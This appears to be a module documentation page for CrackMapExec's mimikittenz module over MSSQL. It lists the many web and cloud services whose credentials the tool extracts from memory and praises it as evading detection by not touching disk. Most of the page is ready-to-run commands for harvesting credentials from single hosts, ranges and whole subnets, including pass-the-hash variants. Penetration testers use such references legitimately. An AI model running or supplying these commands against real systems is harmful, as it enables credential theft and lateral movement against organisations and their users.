CrackMapExec Mimikittenz (mssql)


This page contains detailed information about how to use the mimikittenz CME module while using the mssql protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.

Description


This module executes the Invoke-Mimikittenz.ps1 PowerShell script. The Mimikittenz tool can extract the following credentials from memory:

  • Gmail, Office365, Outlook Web, Xero, MYOB, Juniper SSL-VPN, Citrix NetScaler, Remote Desktop Web Access 2012, Jira, Github, Bugzilla, Zendesk, Cpanel, Malwr, VirusTotal, AnubisLabs, Dropbox, Microsoft Onedrive, AWS Web Services, Slack, Twitter, Facebook

The mimikittenz module is OPSEC safe. This means that it doesn't touch the disk and therefore shouldn't trigger any alarms.

Supported Protocols


  • mssql
  • smb

Module Source Code


Authors


Module Usage


This is how to use the mimikittenz module while using the mssql protocol:

Syntax:
# cme mssql <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M mimikittenz

Admin user:
# cme mssql 10.0.5.1 -u sa -p P@ss123 -d . -M mimikittenz
# cme mssql 10.0.5.1 -u sa -p P@ss123 --local-auth -M mimikittenz

Normal user:
# cme mssql 10.0.5.1 -u dbuser -p P@ss123 -d target.corp -M mimikittenz

CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:

# cme mssql 10.0.5.1 -u sa -H 432b022dc22aa5afe884e986b8383ff2 -d . -M mimikittenz
# cme mssql 10.0.5.1 -u dbuser -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M mimikittenz
The mimikittenz module can be also used against multiple hosts. Here's how to run it against multiple hosts:

# cme mssql target_list.txt -u sa -p P@ss123 -d . -M mimikittenz
# cme mssql 10.0.5.0/24 -u sa -p P@ss123 -d . -M mimikittenz
# cme mssql 10.0.5.1-100 -u sa -p P@ss123 -d . -M mimikittenz

Module Options


As you can see below, the mimikittenz module doesn't have any additional options:

# cme mssql -M mimikittenz --options
[*] mimikittenz module options:

References


Version


This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.